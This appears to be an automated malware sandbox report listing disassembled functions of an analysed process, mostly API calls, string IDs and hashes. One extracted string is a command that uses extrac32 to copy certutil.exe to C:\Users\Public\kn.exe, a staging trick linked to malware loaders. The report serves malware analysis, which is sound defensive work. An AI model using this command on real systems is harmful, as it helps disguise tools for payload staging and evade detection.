                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB177EB7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                              • String ID:
                                              • API String ID: 168394030-0
                                              • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                              • Instruction ID: 241a74e49b9187e88802cd874bba051ce67d4e23434f3c20b5afa32ce5d3a063
                                              • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                              • Instruction Fuzzy Hash: 6FA1D523B0865285FB658B25D8903FA22A1BF8D7ACF404135DA1EC7AF5DF3EE4458706
                                              Function 00007FF6EB1889E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InformationQueryToken
                                              • String ID:
                                              • API String ID: 4239771691-0
                                              • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                              • Instruction ID: 8361b566ee64379451802ba8b5ab7bf1f470b893064abe1a7038d090a5db7ec3
                                              • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                              • Instruction Fuzzy Hash: 60116573618781CBEB118F01E4443E9BBA4FB897A9F404131DB48827A4DF7EE588CB45
                                              Function 00007FF6EB188114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: FileInformation$HandleQueryVolume
                                              • String ID:
                                              • API String ID: 2149833895-0
                                              • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                              • Instruction ID: 2fa126bbe7f52060aa4045926743991718b888f8355a1343397a079399389747
                                              • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                              • Instruction Fuzzy Hash: 7E1173326187C28AEB618B50F4443EEB7A0FB48B5CF445135DA9D82A64DFBDD54CCB05
                                              Function 00007FF6EB198654 Relevance: 3.0, APIs: 2, Instructions: 39timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6EB194227), ref: 00007FF6EB198678
                                              • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF6EB194227), ref: 00007FF6EB1986D4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Time$System$File
                                              • String ID:
                                              • API String ID: 2838179519-0
                                              • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                              • Instruction ID: c89b2840752cc56ad8c78211f82dec81cf1114a3dfb12a0fec0bad5214a3ebf4
                                              • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                              • Instruction Fuzzy Hash: 8A117C57528680C5D7208F21E0002BAB370FF9CB59B145122FA8DC6774EB3DD542CB1A
                                              Function 00007FF6EB178510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • towupper.MSVCRT ref: 00007FF6EB1785D4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                              • String ID:
                                              • API String ID: 3520273530-0
                                              • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                              • Instruction ID: 2c926fa1f9ee03e65e4320c461b71a566b300e27a501335001250744ff5b0422
                                              • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                              • Instruction Fuzzy Hash: 4761C223A0C21281E7659E25D5043F926A0FB0E77CF408136EA1ED72F5DF7EA585831B
                                              Function 00007FF6EB18898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InformationQueryToken
                                              • String ID:
                                              • API String ID: 4239771691-0
                                              • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                              • Instruction ID: 650ca3bbeb8b69583c4a3234df5cb84e6715d1afe8cadaab8dfb019df7431766
                                              • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                              • Instruction Fuzzy Hash: 73F030B3B04B81CBD7018F64E5885DCB778F748B98795853ACB2843714DB76D9A8CB44
                                              Function 00007FF6EB1893B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB1893BB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                              • Instruction ID: f1226fb2c8dc4fac9a09644b90de466d22d8d9229eaf0665ff4a785f097337cb
                                              • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                              • Instruction Fuzzy Hash: 62B01261F25402E1D608AB31EC812E412A07F9C734FD01431C00FC0170DE1EA2DFCB05
                                              Function 00007FF6EB17F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6EB17F52A,00000000,00000000,?,00000000,?,00007FF6EB17E626,?,?,00000000,00007FF6EB181F69), ref: 00007FF6EB17F8DE
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F8FB
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F951
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F96B
                                              • wcschr.MSVCRT ref: 00007FF6EB17FA8E
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB17FB14
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17FB2D
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17FBEA
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB17F996
                                                • Part of subcall function 00007FF6EB180010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6EB19849D,?,?,?,00007FF6EB19F0C7), ref: 00007FF6EB180045
                                                • Part of subcall function 00007FF6EB180010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB19F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB180071
                                                • Part of subcall function 00007FF6EB180010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB180092
                                                • Part of subcall function 00007FF6EB180010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1800A7
                                                • Part of subcall function 00007FF6EB180010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB180181
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D401
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D41B
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D435
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D480
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                              • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                              • API String ID: 3964947564-518410914
                                              • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                              • Instruction ID: e3cf2f185c7aeac820c7151aa2e652254ab392fcafdac13b668b4bb15dcd0551
                                              • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                              • Instruction Fuzzy Hash: 4F025923A19792C6EA149B20E8943F967A1BF4D7B8F544135D94EC37F8DF3EA404C60A
                                              Function 00007FF6EB1802A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmp$iswspacewcschr
                                              • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                              • API String ID: 840959033-3627297882
                                              • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                              • Instruction ID: 36db22cf64496194f80623cf4f0bb4d1a89f19e9b4bcdb2e2af762812bb9cfbe
                                              • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                              • Instruction Fuzzy Hash: F0D17723E0C64386EA10AB60E8553F927A1BF4DBACF444035D94EC62B5DF2EF4048B5A
                                              Function 00007FF6EB18081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmp$EnvironmentVariable
                                              • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                              • API String ID: 198002717-267741548
                                              • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                              • Instruction ID: c13d1c3f64d6ee37264cdfc475664a5d93e56390ea451e7c537cdc5c627f2171
                                              • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                              • Instruction Fuzzy Hash: 5A512023A0874386F6105B15B9143F9AB51FF4EBA8F549039D90E836B4DF2EF448874A
                                              Function 00007FF6EB17EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswdigitiswspacewcschr
                                              • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                              • API String ID: 1595556998-2755026540
                                              • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                              • Instruction ID: c5ae9f056403839dc0dba38e6003b6fa5dd7f7b4a5f6057837c7f2dba6593746
                                              • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                              • Instruction Fuzzy Hash: 22227A67D0C6E2C1FA615B15E4903FA27A0BF0E7B8F504136D98DC32F8DF6EA445861A
                                              Function 00007FF6EB17D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                              • String ID: "$=,;
                                              • API String ID: 3545743878-4143597401
                                              • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                              • Instruction ID: dd9e04ad987cd3a98581e53fdcb9fb8e896325d92db245ebfa6d6ff81805ba94
                                              • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                              • Instruction Fuzzy Hash: 61C1C6A3A0866682EB255B11D4003F976A1FF4EF6CF058035DA4E933E4EF7EA445C70A
                                              Function 00007FF6EB195BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CurrentFormatMessageThread
                                              • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                              • API String ID: 2411632146-3173542853
                                              • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                              • Instruction ID: 14ee8fa28340d204cb46e4895469d77c123a59b8ea8502cb1c70ca38d55ef854
                                              • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                              • Instruction Fuzzy Hash: 45616D62A0978281EB24DB61A4447F5B3A4FF4CBACF440136DA0D97778DF3EE5448B0A
                                              Function 00007FF6EB1826E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CreateFile_open_osfhandle
                                              • String ID: con
                                              • API String ID: 2905481843-4257191772
                                              • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                              • Instruction ID: 589e68dd18be79ac3d3ab86e09284601c2ddd80d023d01030a85e71587fc769d
